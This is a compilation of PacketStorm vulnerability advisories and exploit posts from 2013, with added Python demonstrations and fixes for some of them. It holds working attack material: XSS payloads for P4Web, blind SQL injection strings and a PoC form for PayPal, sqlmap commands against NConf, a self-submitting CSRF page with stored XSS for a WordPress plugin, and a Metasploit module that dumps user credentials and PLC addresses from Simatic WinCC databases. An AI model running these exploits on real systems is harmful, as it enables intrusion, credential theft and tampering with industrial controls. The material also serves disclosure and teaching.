#   http://filehost.perforce.com/perforce/r11.1/bin.ntx86/p4webinst.exe
#   http://www.perforce.com/downloads/perforce/r12.1/bin.ntx86/p4webinst.exe
# Version: P4Web/2011.1 & P4Web/2012.1
# Category: local

Perforce P4Web 2011.1 / 2012.1 has an XSS Vulnerability in its web client which can be actively exploited by attackers.

Perforce P4Web 2011 POC Video: http://www.youtube.com/watch?v=NXrBBYODpPI
Perforce P4Web 2012 POC Video: http://www.youtube.com/watch?v=69nRlTo4aT0

Perforce P4web 2011 POC: Live HTTP Header POST Content

1. Client Name XSS
u=Administrator&p=&c=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Submit=Log+In&orgurl=

2. Client Filter
cnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&cdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&cda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&cho=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter

3. User XSS
http://localhost:8080/@md=c&cd=//&cl=%22%3E%3Cimg%20src=x%20onerror=prompt%280%29;%3E&c=5q7@//?ac=81

4. User Filter XSS
unm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&udu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&uda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter

5. Depot Tree XSS
filter=147&fileFilter=matching&pattern=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&showClient=showClient&Filter=Filter

6. Path XSS
goField=%2F%2F%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Go=Go

7. Branches Filter XSS
bnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&bdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&bow=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&bda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter

8. Labels XSS
lnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after&ldu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&low=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Accessed=after&lda=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter

9. Job View XSS
Filter=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=25&Show=Filter

10. Jobs Filter
Filter=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=10&Jsf=Job&Jsf=Status&Jsf=User&Jsf=Date&Jsf=Description&Show=Filter

11. Change List Filter XSS
UpToVal=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&User=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Max=50&PatVal=...+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Client=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&AllC=y&Show=Filter

12. UserAgent XSS

Regards,
Christy Philip Mathew
Information Security Researcher
Website: Offcon Info Security <http://www.offcon.org>

Source: PacketStorm
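Every payload in the post is the same URL-encoded string, %22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E, which decodes to "><img src=x onerror=prompt(0);>: the leading "> closes whatever double-quoted attribute the filter value is reflected into and the rest is a fresh tag. The Python below is an added example, not code from the researcher or from Perforce: it decodes the post's Client Filter body, reflects one field the unsafe way and the escaped way, and checks whether a new tag made it into the markup. The form field layout is constructed; P4Web's actual templates are not on the page.

```python
import html
from urllib.parse import parse_qs

# The "Client Filter" body from the post (copied), minus repeated fields.
CLIENT_FILTER_BODY = (
    "cnm=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Updated=after"
    "&cdu=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Show=Filter"
)


def decode_fields(body: str) -> dict:
    """application/x-www-form-urlencoded body -> {name: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_unescaped(name: str, value: str) -> str:
    """Models the vulnerable reflection: the submitted value is written back
    into a double-quoted attribute untouched, so '">' ends the attribute and
    the remainder becomes live markup."""
    return f'<input type="text" name="{name}" value="{value}">'


def render_escaped(name: str, value: str) -> str:
    """Hardened reflection: html.escape with quote=True turns " < > & into
    entities, so the value cannot leave the attribute it was put in."""
    return f'<input type="text" name="{name}" value="{html.escape(value, quote=True)}">'


def injects_tag(markup: str) -> bool:
    """Crude check used only to contrast the two renderers."""
    return "<img" in markup.lower()


def reflect_all(body: str, escape: bool) -> dict:
    """Render every field of a body the chosen way: {name: injected?}."""
    render = render_escaped if escape else render_unescaped
    return {k: injects_tag(render(k, v)) for k, v in decode_fields(body).items()}


if __name__ == "__main__":
    print("unescaped:", reflect_all(CLIENT_FILTER_BODY, escape=False))
    print("escaped:  ", reflect_all(CLIENT_FILTER_BODY, escape=True))
```

Attribute-context escaping is the right fix for these fields because all of them are reflected into value="..." attributes; a value reflected into a script block or a URL would need the escaping for that context instead.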
  12. Digitiliti DigiLIBE Management Console version 3.4 suffers from an execution after redirect vulnerability that discloses sensitive information.

Product: DigiLIBE Management Console
Vendor: Digitiliti
Version: < 3.4 - ?
Tested Version: 3.4
Vendor Notified Date: October 09, 2012
Release Date: January 18, 2013
Risk: High
Authentication: None required
Remote: Yes

Description:
Execution After Redirect vulnerabilities exist in DigiLIBE Management Console versions 3.4 and possibly other versions. This allows remote attackers to retrieve sensitive data that should only be returned to authenticated users. By not properly terminating the code after redirection, an unauthenticated attacker can choose not to follow the redirect and view the normally protected content. Successful exploitation of this vulnerability resulted in obtaining the contents of the 'General Configuration'.

Exploit steps for proof-of-concept:
1. Using a proxy such as Burp Proxy, intercept the request: https://vulnerablehost.com/configuration/general_configuration.html
2. Send to repeater.
3. View response.

Vendor Notified: Yes
Vendor Response: November 11, 2012 - Deployed security update. Version not confirmed.

Reference:
CVE-2013-1402
http://cs.ucsb.edu/~bboe/public/pubs/fear-the-ear-ccs2011.pdf
https://www.owasp.org/index.php/Execution_After_Redirect_(EAR)

Credit: Robert Gilbert
HALOCK Security Labs

Source: PacketStorm
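This DigiLIBE advisory and the Weboptima loginPass.php snippet in post 4 above are the same bug class: the handler queues a Location header for an unauthenticated caller and then keeps executing, so a client that simply does not follow the 302 gets the protected body along with it (which is all the Burp Repeater step does). The Python below is an added example, not code from either vendor or from either advisory: it models a handler as a function returning (status, headers, body), shows the missing-return version beside the fixed one, and probes both the way Repeater would. The session key name is taken from the loginPass.php snippet; the protected body is constructed.

```python
PROTECTED_BODY = "<h1>General Configuration</h1><p>smtp_password=constructed-secret</p>"
LOGIN_URL = "/cms/index.php"


def redirect_to_login():
    """Equivalent of PHP header('Location: ...'): it only sets a header and
    status, it does not stop the script."""
    return "302 Found", [("Location", LOGIN_URL)]


def vulnerable_page(session: dict):
    """Execution after redirect: the auth check fires, but nothing returns."""
    status, headers = "200 OK", []
    if session.get("status_shoping_adm") != "adm_shop":
        status, headers = redirect_to_login()
        # BUG: no return/exit here, so the protected content is still built.
    body = PROTECTED_BODY
    return status, headers, body


def fixed_page(session: dict):
    """The redirect terminates the request; nothing sensitive runs after it."""
    if session.get("status_shoping_adm") != "adm_shop":
        status, headers = redirect_to_login()
        return status, headers, ""
    return "200 OK", [], PROTECTED_BODY


def probe_ear(handler, session=None):
    """Act like Repeater: send one request, do NOT follow the redirect, and
    report (redirected?, protected content present in the response body?).
    (True, True) is the EAR signature."""
    status, headers, body = handler(session or {})
    redirected = status.startswith("302") and any(h == "Location" for h, _ in headers)
    leaked = "General Configuration" in body
    return redirected, leaked


if __name__ == "__main__":
    print("vulnerable, anonymous:", probe_ear(vulnerable_page))
    print("fixed, anonymous:     ", probe_ear(fixed_page))
    print("fixed, admin:         ", probe_ear(fixed_page, {"status_shoping_adm": "adm_shop"}))
```

The same probe is a cheap regression test for any page behind a redirect-style auth check: a 3xx status whose body is larger than a bare redirect stub deserves a look.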
  13. PayPal.com suffered from a remote blind SQL injection vulnerability.

Title:
======
Paypal Bug Bounty #18 - Blind SQL Injection Vulnerability

Date:
=====
2013-01-22

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=673
http://news.softpedia.com/news/PayPal-Addresses-Blind-SQL-Injection-Vulnerability-After-Being-Notified-by-Experts-323053.shtml

VL-ID:
=====
673

Common Vulnerability Scoring System:
====================================
8.3

Introduction:
=============
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer's choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account.

PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient's account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay's North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China's bankcard association, to allow Chinese consumers to use PayPal to shop online. PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4-9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal's decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables.

(Copy of the Homepage: www.paypal.com)
[http://en.wikipedia.org/wiki/PayPal]

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a critical Web Vulnerability in the official Paypal ecommerce website application.

Report-Timeline:
================
2012-08-01: Researcher Notification & Coordination
2012-08-01: Vendor Notification
2012-08-07: Vendor Response/Feedback #1
2012-08-07: Vendor Response/Feedback #2
2012-12-04: Vendor Response/Feedback #3
2013-01-12: Vendor Fix/Patch
2013-01-22: Public Disclosure

Status:
========
Published

Affected Products:
==================
PayPal Inc
Product: Core Application 2012 Q4

Exploitation-Technique:
=======================
Remote

Severity:
=========
Critical

Details:
========
A blind SQL Injection vulnerability is detected in the official Paypal ecommerce website application. The vulnerability allows remote attackers or a local low-privileged application user account to inject/execute their own (blind) SQL commands on the affected application DBMS. The vulnerability is located in the Confirm Email module with the bound vulnerable id input field. The validation of the confirm number input field is watching all the context since the first valid number matches. The attacker uses a valid number and includes the statement after it to let both pass through the PayPal application filter. The result is the successful execution of the SQL command when the module is processing to reload the page module. Exploitation of the vulnerability requires a low-privileged application user account to access the website area and can be processed without user interaction. Successful exploitation of the vulnerability results in web application or module compromise via a blind SQL injection attack.

Vulnerable Service(s):
[+] Paypal Inc - Core Application (www.paypal.com)

Vulnerable Module(s):
[+] Confirm Email

Vulnerable Section(s):
[+] Confirm Number (Verification) - Input Field

Vulnerable Parameter(s):
[+] login_confirm_number_id - login_confirm_number

Proof of Concept:
=================
The blind SQL injection vulnerability can be exploited by remote attackers with a low-privileged application user account and without required user interaction.
For demonstration or reproduce ...

URL1: Request a Session with 2 different mails (Step1)
https://www.paypal.com/de/ece/cn=06021484023174514599&em=admin@vulnerabiliuty-lab.com
https://www.paypal.com/de/ece/cn=06021484023174514599&em=01x445@gmail.com

URL2: Injection into ID Confirm Field (Step2)
https://www.paypal.com/de/cgi-bin/webscr?cmd=_confirm-email-password-submit&dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846

1. Open the website of paypal and login as standard user with a restricted account
2. Switch to the webscr > Confirm Email module of the application
3. Request a login confirm id when processing to load a reset
4. Take the valid confirm number of the mail and insert it into the email confirm number verification module input fields
5. Switch to the last char of the valid confirm number in the input field and inject own sql commands as check to proof the validation

Test Strings:
-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'
-1'+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1--1'
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1
1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=-1'

6. Normally the website with the generated ID confirm button is bound to the standard template.
7. Inject substrings with the id -1+sql-query to proof for blind injections in the input field
8. The bottom bar gets loaded as result for the successful executed sql query
8.
Now, the remote attacker can manipulate the paypal core database with a valid confirm number + his own sql commands Bug Type: Blind SQL INJECTION [POST] Injection Vulnerability SESSION: DE - 22:50 -23:15 (paypal.com) Browser: Mozilla Firefox 14.01 PoC: <form method="post" action="https://www.paypal.com/de/cgi-bin/webscr?cmd=_confirm-email-submit& dispatch=5885d80a13c0db1f8e263663d3faee8d7283e7f0184a5674430f290db9e9c846" class=""> <p class="group"><label for="login_confirm_number_id"><span class="labelText"><span class="error"> Please enter it here</span></span></label><span class="field"><input id="login_confirm_number_id" class="xlarge" name="login_confirm_number" value="06021484023174514599-1+[BLIND SQL-INJECTION!]--" type="text"></span></p><p class="buttons"> <input name="confirm.x" value="Confirm" class="button primary" type="submit"></p><input name="form_charset" value="UTF-8" type="hidden"></form> Note: Do all requests ever with id to reproduce the issue. (-) is not possible as first char of the input request. Example(Wrong): -1+[SQL-Injection]&06021484023183514599 Example(Right): 06021484023183514599-1+[SQL-Injection]-- Example(Right): 06021484023183514599-1+AND+IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1-1'-1'-- Test Mail(s): [+] 01x221@gmail.com and admin@vulnerability-lab.com Note: After inject was successful 2 times because of my check, the paypal website opened a security issue report message box as exception-handling. I included the details and information of my test and explained the issue and short time later it has been patched. Solution: ========= 2013-01-12: Vendor Fix/Patch Risk: ===== The security risk of the blind sql injection web vulnerability in the paypal core application is estimated as critical. Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. 
Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. 
Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm
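The extraction loop behind test strings of the form IF(SUBSTRING(VERSION(),1,1)=$i,1,2)=1, as an added example that is not Vulnerability Lab's code and has nothing to do with paypal.com. It assumes a constructed back end: an in-memory SQLite table holding one valid confirm number (2017451459, chosen for the example), a handler that concatenates the submitted value into its WHERE clause the way the advisory describes, and a page that renders differently when a row matches. MySQL's IF()/SUBSTRING()/VERSION() are replaced by SQLite's substr()/unicode()/sqlite_version(); the '+' URL encoding and the '-1' arithmetic prefix of the advisory's strings are left out. The hardened handler beside it binds the value instead of concatenating it.

```python
import sqlite3

# Constructed stand-in for the back end (not PayPal's schema).
VALID_NUMBER = "2017451459"          # constructed valid confirm number
ACTUAL_VERSION = sqlite3.sqlite_version   # what the attacker is trying to learn
STATS = {"requests": 0}              # how many oracle queries the attack costs


def _build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE confirm (number INTEGER, email TEXT)")
    con.execute("INSERT INTO confirm VALUES (?, ?)",
                (int(VALID_NUMBER), "user@example.com"))
    return con


CON = _build_db()


def confirm_vulnerable(number):
    """Vulnerable handler (constructed): the submitted value is concatenated
    into the WHERE clause, as the advisory describes for login_confirm_number.
    Returns True when a row matches (the confirm page renders) and False
    otherwise; that one bit is all a blind attacker observes."""
    STATS["requests"] += 1
    sql = "SELECT email FROM confirm WHERE number = " + number
    try:
        return CON.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False   # a syntax error renders the same as "no match"


def confirm_fixed(number):
    """Hardened handler: the value is bound as a parameter and can only ever
    be compared as data, never parsed as SQL."""
    sql = "SELECT email FROM confirm WHERE number = ?"
    return CON.execute(sql, (number,)).fetchone() is not None


def oracle(condition, handler=confirm_vulnerable):
    """Submit '<valid number> AND <condition>'. As the advisory notes, the
    value has to start with a valid confirm number to be accepted at all."""
    return handler(VALID_NUMBER + " AND " + condition)


def extract_string(expr, ask=oracle, max_len=64):
    """Recover the value of the SQL expression `expr` one character at a
    time, binary-searching the byte value so each character costs about
    seven yes/no questions instead of one per candidate character."""
    out = []
    for pos in range(1, max_len + 1):
        # substr() past the end of the string returns '', which ends the loop.
        if not ask("substr(%s, %d, 1) <> ''" % (expr, pos)):
            break
        lo, hi = 32, 126   # printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            if ask("unicode(substr(%s, %d, 1)) > %d" % (expr, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


def extract_version():
    """The advisory's target, VERSION(), on the SQLite stand-in."""
    return extract_string("sqlite_version()")


if __name__ == "__main__":
    print("oracle 1=1:", oracle("1=1"), " oracle 1=2:", oracle("1=2"))
    print("extracted:", extract_version(), " actual:", ACTUAL_VERSION,
          " requests:", STATS["requests"])
    print("same payload against the fixed handler:",
          confirm_fixed(VALID_NUMBER + " AND 1=1"))
```

The request counter makes the cost visible: a version string of six or seven characters takes on the order of fifty requests, which is why the advisory's note that PayPal raised a "security issue report" after two successful injections matters for a real engagement.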
  14. Cardoza WordPress Poll plugin version 34.05 suffers from multiple remote SQL injection vulnerabilities.

#############################
Exploit Title : Multiple SQL injection vulnerabilities in Cardoza Wordpress poll plugin
Author: Marcela Benetrix
home: www.girlinthemiddle.net
Date: 01/21/13
version: 34.05
software link: http://wordpress.org/extend/plugins/cardoza-wordpress-poll/
#############################

Wordpress Poll plugin description
Wordpress Poll is a completely ajax powered polling system which supports both single and multiple selection of answers. It has interesting functions like statistics, user logs and the opportunity to lock the users by their ip, cookies or id.

##########################
SQL injection location
The problem is located in the file CWPPoll.js, to be more specific the viewPollResults and userlogs methods. Although both ajax functions are used in the administration side they can be accessed by an external script and their parameter (pollid) is not sanitised.

##########################
POC
/wp-admin/admin-ajax.php/?poll_id=2 or 1=1&action=view_poll_result via post/ajax

############################
BONUS TRACK
In the same plugin I found several functions that could have catastrophic results if they are handled by an attacker.
function editAnswer(answerid, poll_id)
function deleteAnswer(answerid, poll_id)
function addAnswer(polls_id)
function deletePoll()
All of them can be accessed from an external call allowing the attacker to add, edit, delete an answer and in the worst case delete a poll. The caller is not verified.

###########################
CVE identifier
CVE-2013-1400 has been assigned to all of the SQL injection issues
CVE-2013-1401 for those functions which can be handled externally

##########################
Vendor Notification
01/17/2013 to: the developer. He replied immediately and fixed the problem. Because of it, a new version has been released

Source: PacketStorm
  15. The Adult Webmaster Script from yagina.com saves the password in a text file within the webroot.

# Exploit Title: Yagina.com Adult Webmaster Script Admin Password Disclosure
# Category: webapps
# Description software : software website for webmasters promoting adult companies through referrals
# Date: 21-1-2013
# Exploit Author: Dshellnoi Unix
# Vendor Homepage: http://www.yagina.com/
# Software Link: http://sourceforge.net/projects/adultweb/?source=dlp
#-----------------------------VULNERABILITY DESCRIPTION------------------------------------#
The failure comes from saving passwords in a text file with the php fwrite function, that can be read by the url
#---------------------------------EXPLOIT---------------------------------------------------#
#exploit
http://[url]/admin/userpwdadfasdfre.txt
#-------------------------------------------------------------------------------------------#
#Thanks to : Luisfer, Ivan sanchez, Juan carlos garcia

Source: PacketStorm
  16. This Metasploit module receives sensitive information from the WinCC database.

# encoding: UTF-8
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::MSSQL

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Simatic WinCC info harvester',
      'Description'    => %q{
        This module receives sensitive information from the WinCC database.
      },
      'Author'         => [
        'Dmitry Nagibin',                              # research
        'Gleb Gritsai <ggritsai@ptsecurity.ru>',       # research
        'Vyacheslav Egoshin <vegoshin@ptsecurity.ru>', # metasploit module
      ],
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'URL', 'http://www.ptsecurity.com' ]
      ],
      'Version'        => '$Revision$',
      'DisclosureDate' => 'Jun 3 2012'
    ))

    register_options(
      [
        OptString.new('DOCUMENTS_FOLDER_NAME', [true, "Documents folder name", 'Documents']),
      ], self.class)
  end

  def run
    if mssql_login_datastore # connect
      # WinCC project databases are named CC_<project>_<digits>
      project_databases_names = q("SELECT name FROM master..sysdatabases WHERE name LIKE 'CC%_[0-9]'") # get db
      return if project_databases_names.nil? # q already printed the error
      get_info project_databases_names
    else
      print_error "Can't connect to the database"
    end
  end

  # Run a query; returns the rows (or the full result hash), nil on error.
  def q query, show_errors = true, verbose = false, only_rows = true
    result = mssql_query(query, verbose)
    if !result[:errors].empty? and show_errors
      print_error "Error: #{result[:errors]}"
      print_error "Error query: #{query}"
    else
      only_rows ? result[:rows] : result
    end
  end

  def get_info dbs
    prj = {}
    dbs.map do |db|
      db = db.first # get db name
      prj[db] = {}  # init hash
      prj[db]["name"]   = q("SELECT DSN FROM #{db}.dbo.CC_CsSysInfoLog")
      prj[db]["admins"] = q("SELECT NAME, convert(varbinary, PASS) as PWD from #{db}.dbo.PW_USER WHERE PASS <> '' and GRPID = 1000")
      prj[db]["users"]  = q("SELECT ID, NAME, convert(varbinary, PASS), GRPID FROM #{db}.[dbo].[PW_USER] WHERE PASS <> '' and GRPID <> 1000")
      prj[db]["groups"] = q("SELECT ID, NAME FROM #{db}.[dbo].[PW_USER] WHERE PASS = ''")
      prj[db]["plcs"]   = q("SELECT CONNECTIONNAME, PARAMETER FROM #{db}.[dbo].[MCPTCONNECTION]")
      prj[db]["tags"]   = q("SELECT VARNAME,VARTYP,COMMENTS FROM #{db}.[dbo].[PDE#TAGs]")

      prj[db]["plcs"] = prj[db]["plcs"].map do |name, ip| # get plc IP
        real_ip = ip # set current value
        real_ip = ip.scan(/\d+\.\d+\.\d+\.\d+/).first if ip =~ /\d+\.\d+\.\d+\.\d+/ # if ip notation found
        [name, real_ip]
      end

      print_good "Project: #{prj[db]["name"].first.first}\n" # print project name

      # Table data
      print_table %w|ID NAME|,                      prj[db]["groups"], "WinCC groups"
      print_table %w|Name Password(hex)|,           prj[db]["admins"], "WinCC administrator"
      print_table %w|ID NAME Password(hex) GRPID|,  prj[db]["users"],  "WinCC users"
      print_table %w|VARNAME VARTYP COMMENTS|,      prj[db]["tags"],   "WinCC tags"
      print_table %w|CONNECTIONNAME PARAMETER|,     prj[db]["plcs"],   "WinCC PLCs"

      # check file access through batched queries
      if can_read_file? db
        settings = read_file get_value("Security settings path"), db
        if settings # save results to file
          File.open("/tmp/security_settings.xml", "w+") do |f|
            f.puts settings
          end
        end
      end
      print_line
    end
  end

  def print_table columns, rows, header = ''
    tbl = Rex::Ui::Text::Table.new(
      'Indent'  => 4,
      'Header'  => header,
      'Columns' => columns
    )
    unless rows.nil?
      rows.each do |r|
        tbl << r # add rows
      end
      print_line tbl.to_s
    end
  end

  # read file through batched queries (BULK INSERT into a scratch table)
  def read_file file_name, db
    q("CREATE TABLE mydata (line varchar(8000));", false)
    q("BULK INSERT mydata FROM '#{file_name}';", false)
    result = q("select * from mydata", false)
    q("DROP TABLE mydata;", false)
    print_error("Can't read file: #{file_name}") if result.nil?
    result
  end

  # check whether the account can read files (probe a file that always exists)
  def can_read_file? db
    res = read_file get_value("test"), db
    print_status "Access read files! (#{get_value "test"} read)" unless res.nil?
    !res.nil? && res.size > 0 # return true or false (nil result means no access)
  end

  def get_value i
    config = {
      "Security settings path" => %q|C:\Documents and Settings\All Users\Documents\SimaticSecurityControl\setRules.xml|,
      "test"                   => %q|C:\Windows\win.ini|
    }
    config[i]
  end
end

Source: PacketStorm
  17. NConf version 1.3 suffers from remote blind SQL injection vulnerabilities in multiple parameters.

# Exploit Title: nconf detail.php?detail_admin_items.php blind injection
# Date: 2013/1/20
# Exploit Author: haidao?54haidao@gmail.com
# Software Link: http://sourceforge.net/projects/nconf/files/nconf/
# Version: nconf 1.3
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3

I found two files we can inject:
/nconf/detail.php?id=1
/nconf/detail_admin_items.php?type=attr&class=host&id=207
In both the inject point is 'id'. You can inject it with sqlmap; of course you must have an account to login.

Inject like this:
python sqlmap.py -u "http://192.168.2.103/nconf/detail.php?id=1" -p id --cookie="XXX" --dbs

[*] starting at 23:45:22
[23:45:22] [INFO] resuming back-end DBMS 'mysql'
[23:45:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6429=6429

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[23:45:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[23:45:22] [INFO] fetching database names
[23:45:22] [INFO] fetching number of databases
[23:45:22] [INFO] resumed: 3
[23:45:22] [INFO] resumed: information_schema
[23:45:22] [INFO] resumed: nconf
[23:45:22] [INFO] resumed: test
available databases [3]:
[*] information_schema
[*] nconf
[*] test

Source: PacketStorm
  18. WordPress Developer Formatter plugin suffers from a cross site request forgery vulnerability.

====================================================================================================================
# Exploit Title: Wordpress Developer Formatter CSRF Vulnerability
# Date: 21/01/13
# Author: Junaid Hussain -[ illSecure Research Group ] -
# Contact: illSecResearchGroup@Gmail.com | Website: illSecure.com
# Software Link: http://wordpress.org/extend/plugins/devformatter/
# Tested on Wordpress Version 3.5, Should work on all versions.
# Google Dork: inurl:devformatter/devformatter.php
====================================================================================================================

[#] Vulnerable Code Page: devinterface.php - Line: 46

<form method="post" action="options-general.php?page=devformatter/devformatter.php">

[#] no nonce given - Read: http://codex.wordpress.org/Function_Reference/wp_nonce_field

====================================================================================================================

// CSRF Exploit:

<html>
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://[DOMAIN NAME]/wp-admin/options-general.php?page=devformatter/devformatter.php">
<input name="usedevformat" style="display:none;" type="checkbox" checked/>
<input name="copyclipboartext" type="text" style="display:none;" value="</textarea><script>alert(/xss/)</script>" />
<input name="showtools" style="display:none;" type="checkbox" checked/>
<textarea name="devfmtcss" rows="6" cols="60" style="display:none;">
body { background-image: url('javascript:alert("XSS");') !important; }
</textarea>
</form>
</body>
</html>

====================================================================================================================

[#] copyclipboartext & devfmtcss are both vulnerable to persistent xss which could lead to cookie stealing, malware distribution or even a defacement.

[#] Disclaimer: This exploit is for Research/Educational/Academic purposes only, The Author of this exploit takes no responsibility for the way you use this exploit, you are responsible for your own actions.

====================================================================================================================

Original: http://illsecure.com/code/Wordpress-DevFormatter-CSRF-Vulnerability.txt

Source: PacketStorm
